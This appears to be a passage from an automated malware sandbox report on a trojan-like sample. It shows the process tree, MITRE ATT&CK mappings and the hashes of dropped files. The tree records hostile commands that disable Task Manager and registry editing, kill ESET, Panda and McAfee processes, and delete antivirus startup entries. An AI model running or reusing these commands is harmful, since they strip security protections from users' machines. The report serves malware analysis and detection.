    PID:3740
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ /v VirusScan Online /f
  2⤵
  PID:4368
- - C:\Windows\SysWOW64\reg.exe
    reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ /v VirusScan Online /f
    3⤵
    - Modifies registry key
    PID:3952
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1
  2⤵
  PID:5808
- - C:\Windows\SysWOW64\reg.exe
    reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1
    3⤵
    - Modifies registry key
    PID:5664
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1
  2⤵
  PID:5820
- - C:\Windows\SysWOW64\reg.exe
    reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1
    3⤵
    - Modifies registry key
    PID:4528
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableRegistryTools /t REG_DWORD /d 1
  2⤵
  PID:5828
- - C:\Windows\SysWOW64\reg.exe
    reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableRegistryTools /t REG_DWORD /d 1
    3⤵
    - Modifies registry key
    PID:6476
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableRegistryTools /t REG_DWORD /d 1
  2⤵
  PID:5836
- - C:\Windows\SysWOW64\reg.exe
    reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableRegistryTools /t REG_DWORD /d 1
    3⤵
    - Modifies registry key
    PID:5344
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SystemRestore /v DisableRegistryTools /t REG_DWORD /d 1
  2⤵
  PID:5844
- - C:\Windows\SysWOW64\reg.exe
    reg add HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SystemRestore /v DisableRegistryTools /t REG_DWORD /d 1
    3⤵
    - Modifies registry key
    PID:5584
- C:\Windows\SysWOW64\taskkill.exe
  taskkill /f /im egui.exe
  2⤵
  - Kills process with taskkill
  PID:5872
- C:\Windows\SysWOW64\taskkill.exe
  taskkill /f /im ekrn.exe
  2⤵
  - Kills process with taskkill
  PID:5880
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c net stop "Panda anti-virus service"
  2⤵
  PID:5892
- - C:\Windows\SysWOW64\net.exe
    net stop "Panda anti-virus service"
    3⤵
    PID:5264
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop "Panda anti-virus service"
      4⤵
      PID:3192
- C:\Windows\SysWOW64\taskkill.exe
  taskkill /f /im ApVxdWin.exe
  2⤵
  - Kills process with taskkill
  PID:5900
- C:\Windows\SysWOW64\taskkill.exe
  taskkill /f /im AVENGINE.exe
  2⤵
  - Kills process with taskkill
  PID:5908
- C:\Windows\SysWOW64\taskkill.exe
  taskkill /f /im pavsrv51.exe
  2⤵
  - Kills process with taskkill
  PID:5916
- C:\Windows\SysWOW64\taskkill.exe
  taskkill /f /im psimreal.exe
  2⤵
  - Kills process with taskkill
  PID:5924
- C:\Windows\SysWOW64\taskkill.exe
  taskkill /f /im PsImSvc.exe
  2⤵
  - Kills process with taskkill
  PID:5932
- C:\Windows\SysWOW64\taskkill.exe
  taskkill /f /im WebProxy.exe
  2⤵
  - Kills process with taskkill
  PID:5944
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ /v APVXDWIN /f
  2⤵
  PID:5952
- - C:\Windows\SysWOW64\reg.exe
    reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ /v APVXDWIN /f
    3⤵
    - Modifies registry key
    PID:5176
- C:\Windows\SysWOW64\taskkill.exe
  taskkill /f /im mcagent.exe
  2⤵
  - Kills process with taskkill
  PID:5960
- C:\Windows\SysWOW64\taskkill.exe
  taskkill /f /im mcdash.exe
  2⤵
  - Kills process with taskkill
  PID:5968
- C:\Windows\SysWOW64\taskkill.exe
  taskkill /f /im mghtml.exe
  2⤵
  - Kills process with taskkill
  PID:5976
- C:\Windows\SysWOW64\taskkill.exe
  taskkill /f /im mcmnhdlr.exe
  2⤵
  - Kills process with taskkill
  PID:5984
- C:\Windows\SysWOW64\taskkill.exe
  taskkill /f /im mcvsshld.exe
  2⤵
  - Kills process with taskkill
  PID:5992
- C:\Windows\SysWOW64\taskkill.exe
  taskkill /f /im McVSEscn.exe
  2⤵
  - Kills process with taskkill
  PID:6000
- C:\Windows\SysWOW64\taskkill.exe
  taskkill /f /im mcvsftsn.exe
  2⤵
  - Kills process with taskkill
  PID:6008
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ /v MCAgentExe /f
  2⤵
  PID:6016
- - C:\Windows\SysWOW64\reg.exe
    reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ /v MCAgentExe /f
    3⤵
    - Modifies registry key
    PID:5416
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ /v McRegWiz /f
  2⤵
  PID:6028
- - C:\Windows\SysWOW64\reg.exe
    reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ /v McRegWiz /f
    3⤵
    - Modifies registry key
    PID:2424
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ /v MCUpdateExe /f
  2⤵
  PID:6048
- - C:\Windows\SysWOW64\reg.exe
    reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ /v MCUpdateExe /f
    3⤵
    - Modifies registry key
    PID:348
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ /v CleanUp /f
  2⤵
  PID:6064
- - C:\Windows\SysWOW64\reg.exe
    reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ /v CleanUp /f
    3⤵
    - Modifies registry key
    PID:5328
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ /v VirusScan Online /f
  2⤵
  PID:6080
- - C:\Windows\SysWOW64\reg.exe
    reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ /v VirusScan Online /f
    3⤵
    - Modifies registry key
    PID:5552
- C:\Users\Admin\AppData\Local\Temp\SpeeD Hack.exe
  "C:\Users\Admin\AppData\Local\Temp\SpeeD Hack.exe"
  2⤵
  - Executes dropped EXE
  PID:6908
- - C:\Windows\SysWOW64\28463\SAKE.exe
    "C:\Windows\system32\28463\SAKE.exe"
    3⤵
    PID:4764
- - C:\Users\Admin\AppData\Local\Temp\HastyMu.exe
    "C:\Users\Admin\AppData\Local\Temp\HastyMu.exe"
    3⤵
    PID:3820
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1
  2⤵
  PID:6916
- - C:\Windows\SysWOW64\reg.exe
    reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1
    3⤵
    - Modifies registry key
    PID:5404
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1
  2⤵
  PID:6928
- - C:\Windows\SysWOW64\reg.exe
    reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1
    3⤵
    - Modifies registry key
    PID:5532
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableRegistryTools /t REG_DWORD /d 1
  2⤵
  PID:6936
- - C:\Windows\SysWOW64\reg.exe
    reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableRegistryTools /t REG_DWORD /d 1
    3⤵
    - Modifies registry key
    PID:2860
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableRegistryTools /t REG_DWORD /d 1
  2⤵
  PID:6944
- - C:\Windows\SysWOW64\reg.exe
    reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableRegistryTools /t REG_DWORD /d 1
    3⤵
    - Modifies registry key
    PID:1004
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SystemRestore /v DisableRegistryTools /t REG_DWORD /d 1
  2⤵
  PID:6952
- - C:\Windows\SysWOW64\reg.exe
    reg add HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SystemRestore /v DisableRegistryTools /t REG_DWORD /d 1
    3⤵
    - Modifies registry key
    PID:5300
- C:\Windows\SysWOW64\taskkill.exe
  taskkill /f /im egui.exe
  2⤵
  - Kills process with taskkill
  PID:6964
- C:\Windows\SysWOW64\taskkill.exe
  taskkill /f /im ekrn.exe
  2⤵
  - Kills process with taskkill
  PID:6972
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c net stop "Panda anti-virus service"
  2⤵
  PID:6980
- - C:\Windows\SysWOW64\net.exe
    net stop "Panda anti-virus service"
    3⤵
    PID:6312
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop "Panda anti-virus service"
      4⤵
      PID:1460
- C:\Windows\SysWOW64\taskkill.exe
  taskkill /f /im ApVxdWin.exe
  2⤵
  - Kills process with taskkill
  PID:6988
- C:\Windows\SysWOW64\taskkill.exe
  taskkill /f /im AVENGINE.exe
  2⤵
  - Kills process with taskkill
  PID:6996
- C:\Windows\SysWOW64\taskkill.exe
  taskkill /f /im pavsrv51.exe
  2⤵
  - Kills process with taskkill
  PID:7004
- C:\Windows\SysWOW64\taskkill.exe
  taskkill /f /im psimreal.exe
  2⤵
  - Kills process with taskkill
  PID:7012
- C:\Windows\SysWOW64\taskkill.exe
  taskkill /f /im PsImSvc.exe
  2⤵
  - Kills process with taskkill
  PID:7024
- C:\Windows\SysWOW64\taskkill.exe
  taskkill /f /im WebProxy.exe
  2⤵
  - Kills process with taskkill
  PID:7032
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ /v APVXDWIN /f
  2⤵
  PID:7040
- - C:\Windows\SysWOW64\reg.exe
    reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ /v APVXDWIN /f
    3⤵
    - Modifies registry key
    PID:1356
- C:\Windows\SysWOW64\taskkill.exe
  taskkill /f /im mcagent.exe
  2⤵
  - Kills process with taskkill
  PID:7048
- C:\Windows\SysWOW64\taskkill.exe
  taskkill /f /im mcdash.exe
  2⤵
  - Kills process with taskkill
  PID:7056
- C:\Windows\SysWOW64\taskkill.exe
  taskkill /f /im mghtml.exe
  2⤵
  - Kills process with taskkill
  PID:7064
- C:\Windows\SysWOW64\taskkill.exe
  taskkill /f /im mcmnhdlr.exe
  2⤵
  - Kills process with taskkill
  PID:7072
- C:\Windows\SysWOW64\taskkill.exe
  taskkill /f /im mcvsshld.exe
  2⤵
  - Kills process with taskkill
  PID:7080
- C:\Windows\SysWOW64\taskkill.exe
  taskkill /f /im McVSEscn.exe
  2⤵
  - Kills process with taskkill
  PID:7088
- C:\Windows\SysWOW64\taskkill.exe
  taskkill /f /im mcvsftsn.exe
  2⤵
  - Kills process with taskkill
  PID:7100
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ /v MCAgentExe /f
  2⤵
  PID:7108
- - C:\Windows\SysWOW64\reg.exe
    reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ /v MCAgentExe /f
    3⤵
    - Modifies registry key
    PID:6308
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ /v McRegWiz /f
  2⤵
  PID:7116
- - C:\Windows\SysWOW64\reg.exe
    reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ /v McRegWiz /f
    3⤵
    - Modifies registry key
    PID:4700
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ /v MCUpdateExe /f
  2⤵
  PID:7124
- - C:\Windows\SysWOW64\reg.exe
    reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ /v MCUpdateExe /f
    3⤵
    - Modifies registry key
    PID:6908
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ /v CleanUp /f
  2⤵
  PID:7132
- - C:\Windows\SysWOW64\reg.exe
    reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ /v CleanUp /f
    3⤵
    - Modifies registry key
    PID:1396
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ /v VirusScan Online /f
  2⤵
  PID:7140
- - C:\Windows\SysWOW64\reg.exe
    reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ /v VirusScan Online /f
    3⤵
    - Modifies registry key
    PID:6512
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1
  2⤵
  PID:7204
- - C:\Windows\SysWOW64\reg.exe
    reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1
    3⤵
    - Modifies registry key
    PID:1536
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1
  2⤵
  PID:7212
- - C:\Windows\SysWOW64\reg.exe
    reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1
    3⤵
    - Modifies registry key
    PID:5080
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableRegistryTools /t REG_DWORD /d 1
  2⤵
  PID:7220
- - C:\Windows\SysWOW64\reg.exe
    reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableRegistryTools /t REG_DWORD /d 1
    3⤵
    - Modifies registry key
    PID:6592
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableRegistryTools /t REG_DWORD /d 1
  2⤵
  PID:7228
- - C:\Windows\SysWOW64\reg.exe
    reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableRegistryTools /t REG_DWORD /d 1
    3⤵
    - Modifies registry key
    PID:3344
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SystemRestore /v DisableRegistryTools /t REG_DWORD /d 1
  2⤵
  PID:7244
- - C:\Windows\SysWOW64\reg.exe
    reg add HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SystemRestore /v DisableRegistryTools /t REG_DWORD /d 1
    3⤵
    - Modifies registry key
    PID:6584

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\FirewallControlPanel.dll,ShowWarningDialog "C:\Users\Admin\AppData\Local\Temp\0f5f2e640ed8bfb8d23cdc99a1d1b586_JaffaCakes118.exe"
1⤵
- Modifies registry class
PID:1672

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\FirewallControlPanel.dll,ShowWarningDialog "C:\Users\Admin\AppData\Local\Temp\0f5f2e640ed8bfb8d23cdc99a1d1b586_JaffaCakes118.exe"
1⤵
- Modifies registry class
PID:5512

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\FirewallControlPanel.dll,ShowWarningDialog "C:\Users\Admin\AppData\Local\Temp\0f5f2e640ed8bfb8d23cdc99a1d1b586_JaffaCakes118.exe"
1⤵
PID:6692

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\FirewallControlPanel.dll,ShowWarningDialog "C:\Users\Admin\AppData\Local\Temp\0f5f2e640ed8bfb8d23cdc99a1d1b586_JaffaCakes118.exe"
1⤵
PID:6640

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --field-trial-handle=3000,i,2727319350781907497,7925939240893079607,262144 --variations-seed-version --mojo-platform-channel-handle=4380 /prefetch:8
1⤵
PID:2596

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\@5416.tmp

Filesize
4KB

MD5
36400e746829504282eb26b364826aa9

SHA1
d39ea9da98be0c331fd71002645f4f40664288a2

SHA256
c7ab756437211f6e0e3dcd7482bc67cb910e504345902049eb8abe34a656deb0

SHA512
5fe8fae2f5fcbd42c72cc8f6dd70aeec0afd94af5cfd905441630755790dc6ed346823ee009c21537b9cdb3b7b7a39eeed933606726ffd891dae47b60465f640

Download Submit
C:\Users\Admin\AppData\Local\Temp\HastyMu.exe

Filesize
460KB

MD5
8f76933cff19c919dc9a03b4ade123c2

SHA1
5617b624fbfbfce2bfbfe55a0c881c231cfa7d12

SHA256
bb44894cc641d8446f8f9a5f9d4698dd3aa4fb22308efd55cefdd8af39669200

SHA512
25d2ddf41057b6b03642c0f8a75b7523ae4301410c35271269381fd681a3e19db05eabd8412c8502597fa794439e12fd990230fe6203ba65360550110b49a49f

Download Submit
C:\Users\Admin\AppData\Local\Temp\SpeeD Hack.exe

Filesize
1.2MB

MD5
b5130cc30896476ac6dba205e441b5c9

SHA1
060834cd3695486f23c79453aaf555fedaf03440

SHA256
0506380afef7a77fb111aecdf02af95f72f098f636dfb13eb0e54492e88721c1

SHA512
89ef9a7945f94da7bc845e4a01c2af7cc5a670afae274ec6a5a6c5982a8a7f6a21d417ab0d003ddc7b7700f32f661e8c742c580c98d73c8f8f938676357b891d

Download Submit
C:\Windows\SysWOW64\28463\AKV.exe

Filesize
457KB

MD5
f34b87951e1a931e01df1bc9f1b98207

SHA1
f3cc94e72bf7e9bf2afa7d8dbfef0ca2087358a1

SHA256
e6cf7cdc5895da8a65f8c4a1a1d0d0583218a1c28f66d25dc56fa67f9c34ed5b

SHA512
c2438d88489b9ed7c6c875ecde07411a488eac9115358c73f72d7029874f75803ebead03a41692a900648fb2b2be63b7c8b4e3a71984261185b6d5d6d7201641

Download Submit
C:\Windows\SysWOW64\28463\SAKE.001

Filesize
484B

MD5
2562d047781d39404ece07a394b9f71b

SHA1
944b14cc5b4b5332634d68c7d36046eb35581483

SHA256
9d96192e38fde561eab790975965697b51a1fbdfacc7ad219b0c3ff3474a8cc0

SHA512
29e8440776d07b348d9af74c5976ae8c17176e3b1a85660889f573c2f2eed74bebe3338cd79c197fea58b275fac6e3ef3a3d8762dd4c7c840d5a866b68c92db8

Download Submit
C:\Windows\SysWOW64\28463\SAKE.006

Filesize
8KB

MD5
98d22fb2035a26a6b9b7decc0c0ff2fa

SHA1
43a75cf59fc2f8b59b1d962b4e685249eef816d5

SHA256
fd5c03fd9ea47c1e820d19bd307ad7c4e53f4b65d288cb675b05cbe76c9b5c25

SHA512
3cb7f765d6f4d1dc08a0087086f3fe243bd8ff9e699607cf1e4177892576665c0c799307751cba16fd3f1482e5abb884090024431be2ce86d4080f1d1134d91f

Download Submit
C:\Windows\SysWOW64\28463\SAKE.007

Filesize
5KB

MD5
15eb312db4b3e208b67082653acb8a02

SHA1
b0926b1e1733baa3d7f18d3806916f92704fccff

SHA256
72347b6d619bc7204a155486e4d09a62a4a494c35a8121349bfe2fecd5af99a8

SHA512
7e8d451bc9d1e83615db15d6cdf68230cdd333fa38362979f0408dc80bf680859a2bc3fc09c494805731317b0f136c3227226092f1bcc31c2c80cb73071aa443

Download Submit
C:\Windows\SysWOW64\28463\SAKE.exe

Filesize
651KB

MD5
b181beaba4204ac3ce7bc8e6f0b74312

SHA1
4ab13763d2ecdf0968f15a39302aab2b1f0ab462

SHA256
f36bad234fd1599dd1398d20bc57499314fe96d5de20074536067b2d3c2b4f2d

SHA512
d1aaa2fd25e53986c8ea8213a8a02515927c9e9aa3e4d8077a138a29ba32c807ec81473b672a22ffb6ba26126ccd7e1d310e057ef964d3b21b1672a67af5fd7b

Download Submit
C:\Windows\SysWOW64\28463\key.bin

Filesize
105B

MD5
27c90d4d9b049f4cd00f32ed1d2e5baf

SHA1
338a3ea8f1e929d8916ece9b6e91e697eb562550

SHA256
172d6f21165fb3ca925e5b000451fd8946920206f7438018c28b158b90cf5ffb

SHA512
d73dadb3cf74c647ce5bad5b87d3fb42a212defcba8afb8cf962020b61a0369c0a2b1005797583daf1f1ae88b29b7288bc544a53d643f3519cf604aa0ffd6dae

Download Submit
memory/4764-60-0x0000000000400000-0x00000000004E0000-memory.dmp

Filesize
896KB

Download
memory/4764-76-0x0000000000400000-0x00000000004E0000-memory.dmp

Filesize
896KB

Download
memory/7480-52-0x0000000000400000-0x00000000004E0000-memory.dmp

Filesize
896KB

Download
memory/7480-78-0x0000000000400000-0x00000000004E0000-memory.dmp

Filesize
896KB

Download
memory/7480-81-0x0000000000400000-0x00000000004E0000-memory.dmp

Filesize
896KB

Download